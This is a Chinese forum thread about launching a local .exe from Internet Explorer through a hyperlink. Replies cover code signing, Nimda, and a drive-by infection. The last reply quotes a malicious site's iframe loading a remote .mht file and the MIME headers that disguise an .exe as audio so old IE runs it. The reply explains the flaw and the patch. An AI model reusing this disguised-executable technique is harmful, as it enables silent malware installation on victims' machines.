请问,怎么通过浏览器打开本地的.EXE文件,具体要求见内容!!!!!

要求:通过Microsoft Internet Explorer 浏览器直接运行本地执行文件(.exe)
       说明:浏览器IE5.0以上版本(包括IE6.0);可执行文件位于上网浏览者本地硬盘  C:\OA\CDOCDATA\BIN\OAGW.EXE
       制作: 1.不能降低浏览器的安全权限,
              2.当运行可执行文件出错时应给出相应的错误提示,
              3.网页中以超链接形式表现。
请各位高手帮帮忙!
最好能给个例子或者是一些技术上的支持。谢谢!!!!!

解决方案 »

  1.   

    TO zleeway(杂草) 
    你说的很对,我也听人说是要数字签名的。
    但苦于知识太乏。请问你能给一些关于数字签名
    的实现方式呢?
    谢谢先!!!
      

  2.   

    数字签名就是烧钱,如果你叔叔是拉登,就可以找比如verisign要个(好像2000$一年,一个app);
    看到过去年(11月)程序员杂志对Nimda的分析,利用MIME漏洞,在邮件里面嵌入exe。
      

  3.   

    利用iframe漏洞进行自动下载运行的。如果不想再次感染上这个病毒,需要更新IE,用Windows Update就行了。漏洞分析,以下代码取自www.dj3344.com,和这个网站的病毒是基本上一样的:
    参看,那个首页里面的一段代码:
    < iframe src=http://www.dj3344.com/dj3344/dj3344.mht ...... >
    起作用的实际是这个dj3344.mht文件,也就是一个.eml格式的文件,
    再下载这个mht文件之后,可以在其中看到如下代码:
    --====B====
    Content-Type: audio/x-wav;
    name="dj3344.exe"
    Content-Transfer-Encoding: base64
    Content-ID: 这句话Content-Type: audio/x-wav;表明下面的那个dj3344.exe是页面的背景音乐wav,这就是IE的漏洞,它会不判断类型就直接打开。修补了漏洞之后这个exe才不会再有自动执行的机会。